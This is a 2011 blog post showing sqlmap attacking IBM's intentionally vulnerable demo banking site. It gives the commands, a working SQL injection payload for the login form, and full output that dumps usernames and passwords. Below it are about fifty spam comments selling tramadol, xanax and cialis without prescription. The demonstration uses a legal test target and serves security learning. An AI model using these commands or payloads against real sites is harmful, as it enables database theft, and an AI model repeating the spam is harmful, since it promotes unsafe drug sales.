Tuesday, May 31, 2011

sqlmap vs IBM's testing web server (part I)

IBM (Testfire) has a "damn" vulnerable web server at location: http://demo.testfire.net/ made for LEGAL web assessment.


[~/Work/sqlmap/trunk/sqlmap] python sqlmap.py -u "http://demo.testfire.net/
bank/login.aspx" --data="uid=test&passw=test123&btnSubmit=Login" --flush-session
 --level=3 --risk=3 --tables --threads=8 --batch

    sqlmap/1.0-dev (r4002) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consent can be considered as an illegal activity. it is the final user's re
sponsibility to obey all applicable local, state and federal laws. authors assum
e no liability and are not responsible for any misuse or damage caused by this p
rogram

[*] starting at: 15:45:54

[15:45:54] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.tes
tfire.net/session' as session file
[15:45:54] [INFO] flushing session file
[15:45:54] [INFO] testing connection to the target url
[15:45:55] [INFO] heuristics detected web page charset 'ascii'
[15:45:55] [INFO] testing if the url is stable, wait a few seconds
[15:45:57] [INFO] url is stable
[15:45:57] [INFO] testing if POST parameter 'uid' is dynamic
[15:45:57] [WARNING] POST parameter 'uid' appears to be not dynamic
[15:45:58] [WARNING] heuristic test shows that POST parameter 'uid' might not be
 injectable
[15:45:58] [INFO] testing sql injection on POST parameter 'uid'
[15:45:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:46:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:47:16] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
    L comment)'
[15:48:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene
    ric comment)'
[15:48:07] [INFO] POST parameter 'uid' is 'OR boolean-based blind - WHERE or HAV
ING clause (Generic comment)' injectable 
[15:48:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[15:48:08] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[15:48:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:48:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[15:48:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[15:48:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
    ype)'
[15:48:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (utl_
    inaddr.get_host_address)'
[15:48:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (ctxs
    ys.drithsx.sn)'
[15:48:11] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[15:48:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[15:48:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[15:48:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[15:48:16] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[15:48:17] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[15:48:18] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[15:48:19] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLTy
    pe)'
[15:48:20] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (utl_i
    naddr.get_host_address)'
[15:48:22] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[15:48:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:48:23] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[15:48:23] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[15:48:23] [INFO] testing 'Oracle error-based - Parameter replace'
[15:48:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:48:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[15:48:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[15:48:24] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[15:48:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[15:48:25] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:48:26] [INFO] testing 'Firebird stacked queries (heavy query)'
[15:48:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[15:48:27] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[15:48:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:48:28] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[15:48:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:48:29] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
    vy query)'
[15:48:30] [INFO] testing 'Oracle AND time-based blind'
[15:48:30] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[15:48:31] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:48:31] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[15:48:32] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[15:48:34] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
    y query)'
[15:48:35] [INFO] testing 'Oracle OR time-based blind'
[15:48:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:48:41] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[15:48:47] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[15:48:52] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[15:49:00] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[15:49:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:49:05] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:10] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns
'
[15:49:10] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:16] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[15:49:16] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:21] [INFO] testing 'Generic UNION query (random number) - 11 to 20 column
s'
[15:49:21] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:26] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[15:49:26] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[15:49:31] [INFO] checking if the injection point on POST parameter 'uid' is a f
alse positive
[15:49:34] [INFO] POST parameter 'uid' is vulnerable. Do you want to keep testin
g the others? [y/N] N
sqlmap identified the following injection points with a total of 340 HTTP(s) req
uests:
---
Place: POST
Parameter: uid
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: uid=-7539' OR NOT (8754=8754)--  &passw=test123&btnSubmit=Login
---

[15:49:34] [INFO] manual usage of POST payloads requires url encoding
[15:49:34] [INFO] testing MySQL
[15:49:35] [WARNING] the back-end DBMS is not MySQL
[15:49:35] [INFO] testing Oracle
[15:49:35] [WARNING] the back-end DBMS is not Oracle
[15:49:35] [INFO] testing PostgreSQL
[15:49:36] [WARNING] the back-end DBMS is not PostgreSQL
[15:49:36] [INFO] testing Microsoft SQL Server
[15:49:36] [WARNING] the back-end DBMS is not Microsoft SQL Server
[15:49:36] [INFO] testing SQLite
[15:49:37] [WARNING] the back-end DBMS is not SQLite
[15:49:37] [INFO] testing Microsoft Access
[15:49:37] [INFO] confirming Microsoft Access
[15:49:38] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[15:49:38] [INFO] fetching tables for database: `Microsoft_Access_masterdb`
[15:49:38] [INFO] fetching number of tables for database '`Microsoft_Access_mast
erdb`'
[15:49:38] [INFO] retrieved: 
[15:49:40] [WARNING] unable to retrieve the number of tables for database '`Micr
osoft_Access_masterdb`'
[15:49:40] [ERROR] cannot retrieve table names, back-end DBMS is Access
[15:49:40] [INFO] do you want to use common table existence check? [Y/n/q] Y
[15:49:40] [INFO] checking table existence using items from '/home/stamparm/Work
/sqlmap/trunk/sqlmap/txt/common-tables.txt'
[15:49:40] [INFO] adding words used on web page to the check list
[15:49:40] [INFO] starting 8 threads
[15:49:41] [INFO] retrieved: users
[15:49:44] [INFO] retrieved: accounts
[15:50:22] [INFO] retrieved: transactions
[15:51:00] [INFO] tried 1018/3168 items (32%)^C
[15:51:00] [WARNING] user aborted during common table existence check. sqlmap wi
ll display some tables only
                                                                                 
Database: Microsoft_Access_masterdb
[3 tables]
+--------------+
| accounts     |
| transactions |
| users        |
+--------------+

[15:51:02] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1209 times
[15:51:02] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/trunk/sqlmap/output/demo.testfire.net'

[*] shutting down at: 15:51:02

[~/Work/sqlmap/trunk/sqlmap] python sqlmap.py -u "http://demo.testfire.net/bank/
login.aspx" --data="uid=test&passw=test123&btnSubmit=Login" --columns -T users -
-threads=8 --batch

    sqlmap/1.0-dev (r4002) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consent can be considered as an illegal activity. it is the final user's re
sponsibility to obey all applicable local, state and federal laws. authors assum
e no liability and are not responsible for any misuse or damage caused by this p
rogram.

[*] starting at: 15:51:30

[15:51:30] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.tes
tfire.net/session' as session file
[15:51:30] [INFO] resuming injection data from session file
[15:51:30] [INFO] resuming back-end DBMS 'microsoft access' from session file
[15:51:30] [INFO] resuming brute forced table name 'users' from session file
[15:51:30] [INFO] resuming brute forced table name 'transactions' from session f
ile
[15:51:30] [INFO] testing connection to the target url
[15:51:31] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: uid
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: uid=-7539' OR NOT (8754=8754)--  &passw=test123&btnSubmit=Login
---

[15:51:31] [INFO] manual usage of POST payloads requires url encoding
[15:51:31] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[15:51:31] [ERROR] cannot retrieve column names, back-end DBMS is Access
[15:51:31] [INFO] do you want to use common columns existence check? [Y/n/q] Y
[15:51:31] [INFO] checking column existence using items from '/home/stamparm/Wor
k/sqlmap/trunk/sqlmap/txt/common-columns.txt'
[15:51:31] [INFO] starting 8 threads
[15:51:34] [INFO] retrieved: first_name                                        
[15:51:34] [INFO] retrieved: username                                          
[15:51:35] [INFO] retrieved: userid                                            
[15:51:42] [INFO] retrieved: last_name                                         
[15:51:46] [INFO] retrieved: password                                          
[15:52:14] [INFO] tried 558/2442 items (23%)^C
[15:52:14] [WARNING] user aborted during common column existence check. sqlmap w
ill display some columns only
                                                                               
Database: `Microsoft_Access_masterdb`
Table: users
[5 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| first_name | non-numeric |
| last_name  | non-numeric |
| password   | non-numeric |
| userid     | numeric     |
| username   | non-numeric |
+------------+-------------+

[15:52:17] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 558 times
[15:52:17] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/trunk/sqlmap/output/demo.testfire.net'

[*] shutting down at: 15:52:17

[16] Tue 31.May.2011 15:52:17                                                   
[~/Work/sqlmap/trunk/sqlmap] python sqlmap.py -u "http://demo.testfire.net/bank/
login.aspx" --data="uid=test&passw=test123&btnSubmit=Login" --dump -C userid,use
rname,password -T users --threads=8 --batch

    sqlmap/1.0-dev (r4002) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consent can be considered as an illegal activity. it is the final user's re
sponsibility to obey all applicable local, state and federal laws. authors assum
e no liability and are not responsible for any misuse or damage caused by this p
rogram.

[*] starting at: 15:52:36

[15:52:36] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.tes
tfire.net/session' as session file
[15:52:36] [INFO] resuming injection data from session file
[15:52:36] [INFO] resuming back-end DBMS 'microsoft access' from session file
[15:52:36] [INFO] resuming brute forced table name 'users' from session file
[15:52:36] [INFO] resuming brute forced table name 'transactions' from session f
ile
[15:52:36] [INFO] resuming brute forced column name 'first_name' for table 'user
s' from session file
[15:52:36] [INFO] resuming brute forced column name 'username' for table 'users'
from session file
[15:52:36] [INFO] resuming brute forced column name 'userid' for table 'users' 
from session file
[15:52:36] [INFO] resuming brute forced column name 'last_name' for table 'users
' from session file
[15:52:36] [INFO] resuming brute forced column name 'password' for table 'users'
 from session file
[15:52:36] [INFO] testing connection to the target url
[15:52:37] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: uid
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: uid=-7539' OR NOT (8754=8754)--  &passw=test123&btnSubmit=Login
---

[15:52:37] [INFO] manual usage of POST payloads requires url encoding
[15:52:37] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
[15:52:37] [ERROR] cannot retrieve column names, back-end DBMS is Access
[15:52:37] [INFO] fetching column(s) 'username, password, userid' entries for ta
ble 'users' on database 'Microsoft_Access_masterdb'
[15:52:37] [INFO] fetching number of columns 'username, password, userid' entrie
s for table 'users' on database 'Microsoft_Access_masterdb'
[15:52:37] [INFO] retrieved: 6
[15:52:42] [INFO] fetching number of distinct values for column 'userid'
[15:52:42] [INFO] retrieved: 6
[15:52:50] [INFO] using column 'userid' as a pivot for retrieving row data
[15:52:50] [INFO] retrieving the length of query output
[15:52:50] [INFO] retrieved: 1
[15:52:54] [INFO] retrieved: 1
[15:53:02] [INFO] retrieving the length of query output
[15:53:02] [INFO] retrieved: 5
[15:53:15] [INFO] retrieved: admin           
[15:53:15] [INFO] retrieving the length of query output
[15:53:15] [INFO] retrieved: 5
[15:53:30] [INFO] retrieved: admin           
[15:53:30] [INFO] retrieving the length of query output
[15:53:30] [INFO] retrieved: 9
[15:53:49] [INFO] retrieved: 100116013           
[15:53:49] [INFO] retrieving the length of query output
[15:53:49] [INFO] retrieved: 4
[15:54:00] [INFO] retrieved: sjoe           
[15:54:00] [INFO] retrieving the length of query output
[15:54:00] [INFO] retrieved: 7
[15:54:16] [INFO] retrieved: frazier           
[15:54:16] [INFO] retrieving the length of query output
[15:54:16] [INFO] retrieved: 9
[15:54:35] [INFO] retrieved: 100116014           
[15:54:35] [INFO] retrieving the length of query output
[15:54:35] [INFO] retrieved: 6
[15:54:50] [INFO] retrieved: jsmith           
[15:54:50] [INFO] retrieving the length of query output
[15:54:50] [INFO] retrieved: 8
[15:55:11] [INFO] retrieved: Demo1234           
[15:55:11] [INFO] retrieving the length of query output
[15:55:11] [INFO] retrieved: 9
[15:55:31] [INFO] retrieved: 100116015           
[15:55:31] [INFO] retrieving the length of query output
[15:55:31] [INFO] retrieved: 5
[15:55:44] [INFO] retrieved: cclay           
[15:55:44] [INFO] retrieving the length of query output
[15:55:44] [INFO] retrieved: 3
[15:55:55] [INFO] retrieved: Ali           
[15:55:55] [INFO] retrieving the length of query output
[15:55:55] [INFO] retrieved: 9
[15:56:14] [INFO] retrieved: 100116018           
[15:56:14] [INFO] retrieving the length of query output
[15:56:14] [INFO] retrieved: 6
[15:56:30] [INFO] retrieved: sspeed           
[15:56:30] [INFO] retrieving the length of query output
[15:56:30] [INFO] retrieved: 8
[15:56:47] [INFO] retrieved: Demo1234           
[15:56:47] [INFO] retrieving the length of query output
[15:56:47] [INFO] retrieved: 1
[15:56:50] [INFO] retrieved: 2
[15:56:58] [INFO] retrieving the length of query output
[15:56:58] [INFO] retrieved: 5
[15:57:10] [INFO] retrieved: tuser           
[15:57:10] [INFO] retrieving the length of query output
[15:57:10] [INFO] retrieved: 5
[15:57:23] [INFO] retrieved: tuser           
Database: Microsoft_Access_masterdb
Table: users
[6 entries]
+----------+-----------+----------+
| password | userid    | username |
+----------+-----------+----------+
| admin    | 1         | admin    |
| frazier  | 100116013 | sjoe     |
| Demo1234 | 100116014 | jsmith   |
| Ali      | 100116015 | cclay    |
| Demo1234 | 100116018 | sspeed   |
| tuser    | 2         | tuser    |
+----------+-----------+----------+

[15:57:23] [INFO] Table 'Microsoft_Access_masterdb.users' dumped to CSV file '/h
ome/stamparm/Work/sqlmap/trunk/sqlmap/output/demo.testfire.net/dump/Microsoft_Ac
cess_masterdb/users.csv'
[15:57:23] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 470 times
[15:57:23] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/trunk/sqlmap/output/demo.testfire.net'

[*] shutting down at: 15:57:23

53 comments:

BROU KOUAKOU DONATIEN said...

thx please cant sqlmap copy the Microsoft_Access_masterdb to the local disk f yes what are the commands for that

Anonymous said...

Ahaa, its fastidious conversation regarding this paragraph at this place at this web site, I
have read all that, so at this time me also commenting at this place.
Also see my webpage > forja

Anonymous said...

You really make it appear really easy along with your presentation but I find this topic to
be really something that I feel I would never understand.
It kind of feels too complicated and very wide
for me. I am taking a look forward in your subsequent submit, I'll attempt to get the dangle of it!
My web site ; Instalación geotermia en Madrid

Anonymous said...

xanax without prescription xanax side effects 1 mg - xanax generic identification

Anonymous said...

tramadol 100mg tramadol 100mg used - buy tramadol medication

Anonymous said...

buy tramadol online buy tramadol online no prescription mastercard - tramadol buy online florida

Anonymous said...

buy tramadol online purchase tramadol online no prescription - maximum dosage tramadol 50mg

Anonymous said...

buy carisoprodol carisoprodol detection drug test - carisoprodol online overnight

Anonymous said...

cheap tramadol online tramadol 50mg usa - buy tramadol online us pharmacy

Anonymous said...

xanax generic xanax dosage 120 lbs - buy xanax online with no prescription needed

Anonymous said...

buy tramadol online tramadol withdrawal duration - buy tramadol overnight no prescription

Anonymous said...

generic xanax side effects yellow xanax bars - green xanax pills s 902

Anonymous said...

carisoprodol 350 mg listaflex carisoprodol 350 mg para sirve - carisoprodol price

Anonymous said...

buy tramadol online many tramadol 50mg get high - can you buy tramadol internet

Anonymous said...

buy tramadol online tramadol hcl 50 mg para que sirve - tramadol hcl 50 mg webmd

Anonymous said...

buy cialis online buy cialis online ireland - cialis online order

Anonymous said...

buy cialis online buy generic cialis online usa - where to buy cialis online

Anonymous said...

xanax online xanax drug sleep - xanax side effects weight

Anonymous said...

buy tramadol online tramadol 50 mg purchase - tramadol ingredients side effects

Anonymous said...

buy generic cialis online no prescription generic cialis 20mg tablets - buy cialis online malaysia

Anonymous said...

cialis online buy cialis from us - generic cialis bangkok

Anonymous said...

cialis online buy cialis in south africa - cialis 5 mg daily review

Anonymous said...

buy cialis online can you buy cialis online in australia - can you buy cialis in hong kong

Anonymous said...

cialis online buy cialis online paypal - low dose cialis reviews

Anonymous said...

buy cialis online cialis daily use - cialis price in us

Anonymous said...

cialis online generic cialis goedkoop - cialis price walmart pharmacy

Anonymous said...

cialis online cialis dose - generic cialis tadalafil 20mg reviews

Anonymous said...

buy tramadol online tramadol for sale online no prescription - buy 200 mg tramadol online

Anonymous said...

learn how to buy tramdadol order tramadol online legally - tramadol 150 mg dose

Anonymous said...

http://landvoicelearning.com/#23561 where should i buy tramadol from online - tramadol and high

Anonymous said...

buy tramadol buy tramadol no prescription 100 mg - need purchase tramadol

Anonymous said...

http://landvoicelearning.com/#97734 can you order tramadol online legally - tramadol for dogs tablets

Anonymous said...

buy tramadol tramadol 50 mg a normal dose - tramadol x 225

Anonymous said...

buy tramadol online cheap tramadol overnight no prescription - buy tramadol online from usa

Anonymous said...

http://landvoicelearning.com/#30896 tramadol 50 mg withdrawal - tramadol 50 mg recommended dosage

Anonymous said...

http://blog.dawn.com/dblog/buy/#91875 effects of tramadol high - tramadol vs hydrocodone

Anonymous said...

http://buytramadolonlinecool.com/#73892 buy tramadol overnight delivery - buy tramadol 6914

Anonymous said...

buy tramadol online tramadol 50 mg how many - tramadol hcl 50 mg efectos secundarios

Anonymous said...

http://landvoicelearning.com/#44827 tramadol generic ultram 50 mg 180 pills - amneal tramadol ingredients

Anonymous said...

http://landvoicelearning.com/#63987 tramadol 50mg street - buy tramadol visa

Anonymous said...

buy ativan online ativan overdose in the elderly - ativan side effects burning sensation

Anonymous said...

buy ativan online ativan side effects dry mouth - xanax ativan overdose

Anonymous said...

buy tramadol online does tramadol 50 mg do you - purchase tramadol no prescription

Anonymous said...

order xanax no prescription buy xanax amsterdam - boost your xanax high

Anonymous said...

buy tramadol online tramadol 50mg get you high - tramadol buy australia

Anonymous said...

where can i order xanax online xanax and alcohol reaction - xanax dosage before flight

Anonymous said...

buy xanax online does xanax show up home drug test - xanax dosage erowid

Anonymous said...

buy xanax online buy xanax online no membership - xanax overdose can kill you

Anonymous said...

buy xanax online alternatives to xanax for anxiety - xanax withdrawal last

Anonymous said...

Xanax is shit

Anonymous said...

http://ranchodelastortugas.com/#61301 xanax dosage intervals - buy xanax online discover card

Anonymous said...

http://bayshorechryslerjeep.com/#3880 dose of xanax for anxiety - xanax side effects mayo

Anonymous said...

buy xanax online xanax drug name - xanax quotes for myspace